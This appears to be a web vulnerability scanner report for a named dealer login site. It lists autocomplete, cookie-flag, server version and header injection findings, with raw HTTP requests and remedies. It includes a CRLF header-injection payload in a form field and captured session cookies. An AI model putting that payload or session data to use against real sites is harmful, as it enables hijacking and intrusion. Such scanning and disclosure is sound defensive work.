https://cc.dealer.com/views/mshtml.HTMLInputElementClass

Parameters

Parameter	Type	Value
action	POST	Login
reseller	POST	3
lang	POST	http://example.com/? ns: netsparker056650=vuln
username	POST	Ronald Smith
password	POST	3
storeCookie	POST	storeCookie

Request

POST /views/mshtml.HTMLInputElementClass HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=1psr2n1hjmjat; ssoid=6105c5714046381101f5ba553115c7e3
Content-Length: 141
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

action=Login&reseller=3&lang=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&username=Ronald+Smith&password=3&storeCookie=storeCookie

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=3&lang=http://example.com/?
ns: netsparker056650vuln&reason=INVALID_USERNAME_PASSWORD
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:14:19 GMT
Connection: keep-alive
Set-Cookie: ssoid=6105c5714046381101f5ba553115c7e3;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT,ssoid=6105c725404638d30061b29f59df6503;path=/;domain=.dealer.com
Expires: Thu, 01 Jan 1970 00:00:00 GMT

Auto Complete Enabled

1 TOTAL

LOW

CONFIRMED

"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

See the remedy for the solution.
Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

Using AutoComplete in HTML Forms

- /views/login

/views/login CONFIRMED

https://cc.dealer.com/views/login?sessionTimedOut=true

Identified Field Name

password

Request

GET /views/login?sessionTimedOut=true HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3703
Date: Sun, 17 Apr 2011 01:12:25 GMT
Connection: keep-alive
Set-Cookie: ssoid=61040b4f404638d30061b29f51d97f36;path=/;domain=.dealer.com,BIGipServerSecureCC5Pool=2248216074.20736.0000; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>Dealer.com Login</title> <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="javascript"></script> <script language="javascript"> function doLogin() { if(hasSubmitted) return false; theForm = document.forms[0]; var pwEl = theForm.elements["password"]; if( pwEl.value != "" && pwEl.value.length != 32) { pwEl.value=hex_md5(pwEl.value); } // password validation in both ext-user-manager.js (for changing password) and login.vm (for expired passwords) hasSubmitted = true; return true; } function forgotPassword() { var extra = ""; if(document.forms[0].elements["username"].value!="") extra="?_username="+document.forms[0].elements["username"].value+"&reseller=&lang=en_US"; document.location = "/views/forgot-password"+((extra)?extra:"?reseller=&lang=en_US"); } </script> <style type="text/css" media="screen"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc2.dealer.com/images/login_graphic.png?1276795935000) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 300px; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #ie6Upgrade, #ff2Upgrade{ /*visibility: hidden;*/ display: none; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #ie6Upgrade td, #ff2Upgrade td{ font-size: 11px; font-weight: normal; } .languageName{ text-transform: capitalize; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;}</style></head><body onLoad="doPageLoad()"><form action="/" method="POST" onSubmit="return doLogin();" id="loginForm"><input type="hidden" name="action" value="Login"><input type="hidden" name="reseller" value=""><input type="hidden" name="lang" value=""><table id="loginTable" style="visibility:hidden" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="5" cellspacing="0" id="links"> <tr> <td align="center" class="ieHack"><a href="http://dealer.com" target="_blank" border="0"><span>Visit Dealer.com</span></a></td> <td align="center"><a href="javascript:addBookmark()" border="0"><span>Bookmark This Page</span></a></td> <td align="center"><a href="javascript:forgotPassword()" border="0"><span>Forgot Username/Password?</span></a></td> </tr> </table> <div id="loginBox"> <table id="loginFormTable" width="100%" cellspacing="4" cellpadding="2" border="0"> <colgroup> <col style="padding-left:5px"> <col width="80%"> </colgroup> <tr> <td colspan="2"> <div class="instructions">Your session has expired, please login again.</div> </td> </tr> <tr> <td nowrap><label for="username">Username:</label></td> <td ><input name="username" style="width: 90%" ></td> </tr> <tr> <td nowrap><label for="password">Password:</label></td> <td><input name="password" type="password" style="width: 90%"></td> </tr> <tr> <td colspan="2" align="center" nowrap> <input type="checkbox" name="storeCookie" value="storeCookie"/> <label for="storeCookie">Remember my username and password</label> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="Login"> </td> </tr> </table> </div> <div id="ie6Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> <div id="ff2Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old version of Firefox which we no longer support.<br/> Starting March 1st, 2009, you will no longer be able to login to ControlCenter with this browser.<br/><br/> <a href="http://www.getfirefox.com" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> </td> </tr></table></form><script src="https://cc1.dealer.com/js/ddc/veneer/util/ext-browser-info-min.js?1302618944000" language="javascript"></script><script src="https://cc3.dealer.com/js/ddc/veneer/ext-login-validation-min.js?1302618944000" language="javascript"></script><style type="text/css" media="screen"> #browserDetectionTable{ visibility: hidden; } #loggedInTable{ position: absolute; top: 0; left: 0; visibility: hidden; }</style><table id="browserDetectionTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="top"> <br/><br/><br/><br/><br/><br/><br/> We have minimum browser requirements to use our application.<br/><br/> We require Firefox 3.0 & above on Windows or Macintosh.<br/> or Internet Explorer version 7.0 on Windows.<br/>  Please click one of these options download:<br/><br/> <table width="70%"> <tr> <td align="center" class="clickable" style="color: #fd6400;" valign="middle" onclick="location='http://www.mozilla.com/firefox'"> Click to download Firefox 3.0<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'><br/> Click to download Firefox 3.0 </td> <td align="center" class="clickable" valign="middle" style="color: #000099;" onclick="location='http://www.microsoft.com/windows/ie/downloads/default.mspx'"> Click to download IE 7.0<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'><br/> Click to download IE 7.0 </td> </tr> </table> </td> </tr></table><table id="loggedInTable" border="0" width="100%" height="70%"> <tr> <td align="center" valign="center" style="font-family: arial; font-weight: bold"> <span style="color: #880000"> If you have a pop-up blocker installed, it could prevent the login window from appearing.<br/> Please remember to turn off your pop-up blocker for all dealer.com sites. Thank you. </span><br/><br/> <img src="https://cc3.dealer.com/images/logo.png?1276795935000" border='0'><br/> (You are now logged in and may close this window) </td> </tr></table><script type="text/javascript" language="javascript">BrowserInfo.isDev = ("false" == "true");BrowserInfo.embeddedBrowser = ("" == "true");BrowserInfo.isInternal = ("false" == "true");// since this page gets loaded before the main framework, localized strings for JS need to be included this wayLoginValidator.localizedStrings = { "800_X_600_WARNING" : "Your screen resolution is set to 800 x 600.\nAlthough you can use Control Center at this lower resolution, it functions best at a higher resolution, like 1024 x 768."};LoginValidator.validate("","","","en_US");</script> <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script> <script type="text/javascript">try{var tracker=_gat._getTracker("UA-248438-3");tracker._initData();tracker._trackPageview()}catch(e){}</script></body> <script language="javascript"> //we need to check for a module hash and preserve that //as well as any query string params //for deep linking into modules var hash = document.location.hash; //we need to reset the form's action //so we include the hash and query params //using get and set Attribute bc there is a form field //named action inside the form....grrrr! var oldAction = document.forms[0].attributes["action"].value; document.forms[0].attributes["action"].value = oldAction + hash; var hasSubmitted = false; if( opener && opener.location.href.indexOf("/views/login") == -1 ){ opener.location = "/views/login?reseller=&lang=en_US" + (hash); window.close(); } if( window != top ) top.location = location.href; function doPageLoad(){ if( BrowserInfo.isIE() && BrowserInfo.version < 7.0){ //document.getElementById("ie6Upgrade").style.visibility = "visible"; document.getElementById("ie6Upgrade").style.display = "block"; } if( BrowserInfo.isFirefox() && BrowserInfo.version < "3."){ //document.getElementById("ff2Upgrade").style.visibility = "visible"; document.getElementById("ff2Upgrade").style.display = "block"; } if( document.getElementById("loginTable").style.display != "none" ) document.forms[0].username.focus(); } function addBookmark(){ var title = "Dealer.com Login"; //var url = "http://cc.dealer.com/views/login"; var url = location.href; if( document.all ) window.external.AddFavorite( url, title ); else if( window.sidebar ) window.sidebar.addPanel( title, url, ""); } </script></html>

Cookie Not Marked As HttpOnly

1 TOTAL

LOW

CONFIRMED

Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

See the remedy for solution
Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /views/

/views/ CONFIRMED

https://cc.dealer.com/views/

Identified Cookie

ssoid

Request

Response

Apache Version Disclosure

1 TOTAL

LOW

Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

- /views/login

/views/login

http://cc.dealer.com/views/login

Extracted Version

Apache/2.2.3 (CentOS)

Request

GET /views/login HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2650869258.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; ssoid=61040d2140463812016995a202bc0759
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.3 (CentOS)
Location: https://cc.dealer.com/views/login
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:12:26 GMT
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://cc.dealer.com/views/login">here</a>.</p></body></html>

XSS, DORK, HTTP Header Injection, cc.dealer.com

Total Requests

Average Speed

GHDB, DORK Tests

VULNERABILITIES

Cross-site Scripting

Impact

Remedy

Remedy References

External References

/views/forgot-password CONFIRMED

Parameters

Request

Response

/views/login CONFIRMED

Parameters

Request

Response

/views/login CONFIRMED

Parameters

Request

Response

/views/login CONFIRMED

Parameters

Request

Response

/views/login CONFIRMED

Parameters

Request

Response

/views/forgot-password CONFIRMED

Parameters

Request

Response

Cookie Not Marked As Secure

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

/views/ CONFIRMED

Identified Cookie

Request

Response

HTTP Header Injection

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

External References

/views/login

Parameters

Request

Response

/views/login

Parameters

Request

Response

/views/mshtml.HTMLInputElementClass

Parameters

Request

Response

/views/mshtml.HTMLInputElementClass

Parameters

Request

Response

Auto Complete Enabled

Impact

Remedy

Actions to Take

Required Skills for Successful Exploitation

External References

/views/login CONFIRMED

Identified Field Name

Request

Response

Cookie Not Marked As HttpOnly

Impact

Actions to Take

Remedy

External References